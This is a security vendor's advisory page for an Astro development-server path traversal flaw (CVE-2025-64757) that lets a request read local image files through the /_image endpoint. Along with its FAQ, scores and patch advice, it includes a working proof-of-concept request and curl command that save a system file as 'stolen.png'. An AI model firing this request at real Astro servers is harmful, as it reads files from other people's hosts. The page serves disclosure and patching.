How severe is GHSA-x3h8-62x9-952g?

GHSA-x3h8-62x9-952g has a CVSS score of 3.5/10, rated LOW. Review your exposure and patch according to your risk tolerance.

Which packages are affected by GHSA-x3h8-62x9-952g?

GHSA-x3h8-62x9-952g affects the following packages: astro (npm). Ecosystems affected: npm.

How do I fix GHSA-x3h8-62x9-952g?

Update astro to 5.14.3 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-x3h8-62x9-952g is resolved across your whole dependency graph.

How do I detect GHSA-x3h8-62x9-952g in my npm dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for astro. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-x3h8-62x9-952g if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-x3h8-62x9-952g?

O3 pinpoints whether GHSA-x3h8-62x9-952g is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-x3h8-62x9-952g actively exploited in the wild?

No public exploit code has been indexed for GHSA-x3h8-62x9-952g yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

What is the EPSS score for GHSA-x3h8-62x9-952g?

GHSA-x3h8-62x9-952g has an EPSS (Exploit Prediction Scoring System) score of 0.4%, placing it in the 34th percentile of all CVEs. EPSS is maintained by FIRST.org and estimates the probability that a vulnerability will be exploited in the wild within the next 30 days. This score indicates relatively lower exploitation probability, though the CVSS severity should still guide your patching priority.

What type of vulnerability is GHSA-x3h8-62x9-952g?

GHSA-x3h8-62x9-952g is classified as Path Traversal (CWE-22), CWE-23 (CWE-23). These weakness types describe the underlying flaw category, which helps determine the potential impact and the right class of mitigation. This is a high-impact weakness class that often enables remote code execution or data exposure.

When was GHSA-x3h8-62x9-952g published, and has it been updated?

GHSA-x3h8-62x9-952g was published on November 19, 2025 and was last updated on November 20, 2025. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

📦 npm

GHSA-x3h8-62x9-952g

LOW

Astro Development Server has Arbitrary Local File Read

Also known asCVE-2025-64757

Published

Nov 19, 2025

Updated

Nov 20, 2025

Affected

1 pkg

Patched

1 / 1

Exploits

None indexed

EPSS Exploitation Probability

via FIRST.org ↗

0.4%probability of exploitation in next 30 days

Lower Risk34th percentile+0.40%

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.

astronpm

3.6Mdownloads / week

Description

Summary

A vulnerability has been identified in the Astro framework's development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system.

Details

Title: Arbitrary Local File Read in Astro Development Image Endpoint
Type: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Component: /packages/astro/src/assets/endpoint/node.ts
Affected Versions: Astro v5.x development builds (confirmed v5.13.3)
Attack Vector: Network (HTTP GET request)
Authentication Required: None

The vulnerability exists in the Node.js image endpoint handler used during development mode. The endpoint accepts an href parameter that specifies the path to an image file. In development mode, this parameter is processed without adequate path validation, allowing attackers to specify absolute file paths.

Vulnerable Code Location: packages/astro/src/assets/endpoint/node.ts

// Vulnerable code in development mode
if (import.meta.env.DEV) {
    fileUrl = pathToFileURL(removeQueryString(replaceFileSystemReferences(src)));
} else {
    // Production has proper path validation
    // ... security checks omitted in dev mode
}

The development branch bypasses the security checks that exist in the production code path, which validates that file paths are within the allowed assets directory.

PoC

Attack Prerequisites

Astro development server must be running (astro dev)
The /_image endpoint must be accessible to the attacker
Target image files must be readable by the Node.js process

Exploit Steps

Start Astro Development Server:

astro dev  # Typically runs on http://localhost:4321

Craft Malicious Request:

GET /_image?href=/[ABSOLUTE_PATH_TO_IMAGE]&w=100&h=100&f=png HTTP/1.1
Host: localhost:4321

Example Attack:

curl "http://localhost:4321/_image?href=/%2FSystem%2FLibrary%2FImage%20Capture%2FAutomatic%20Tasks%2FMakePDF.app%2FContents%2FResources%2F0blank.jpg&w=100&h=100&f=png" -o stolen.png

Demonstration Results

Test Environment: macOS with Astro v5.13.3

Successful Exploitation:

Target: /System/Library/Image Capture/Automatic Tasks/MakePDF.app/Contents/Resources/0blank.jpg
Response: HTTP 200 OK, Content-Type: image/png
Exfiltration: 303 bytes (100x100 PNG)
File Created: stolen-image.png containing processed system image

Attack Payload:

http://localhost:4321/_image?href=/%2FSystem%2FLibrary%2FImage%20Capture%2FAutomatic%20Tasks%2FMakePDF.app%2FContents%2FResources%2F0blank.jpg&w=100&h=100&f=png

Server Response:

Status: 200 OK
Content-Type: image/png
Content-Length: 303

Impact

Confidentiality Impact: HIGH

Scope: Any image file readable by the Node.js process
Exfiltration Method: Complete file contents via HTTP response (transformed to PNG)

Integrity Impact: NONE

The vulnerability only allows reading files, not modification

Availability Impact: NONE

No direct impact on system availability
Potential for resource exhaustion through repeated large image requests

Affected Components

Primary Component

File: packages/astro/src/assets/endpoint/node.ts
Function: loadLocalImage()
Lines: Development mode branch (~25-35)

Secondary Components

File: packages/astro/src/assets/endpoint/generic.ts
Impact: Uses different code path, not directly vulnerable
Note: Implements proper remote allowlist validation

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
📦npm	`astro`	all versions	5.14.3

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for astro. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update astro to 5.14.3 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-x3h8-62x9-952g is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-x3h8-62x9-952g is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-x3h8-62x9-952g. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary A vulnerability has been identified in the Astro framework's development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system. ### Details - **Title**: Arbitrary Local File Read in Astro Development Image Endpoint - **Type**: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') - **Component**: `/packages/astro/src/assets/endpoint/node.ts` - **Affect

O3 Security · Impact-Aware SCA

Is GHSA-x3h8-62x9-952g in your dependencies?

O3 detects GHSA-x3h8-62x9-952g across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works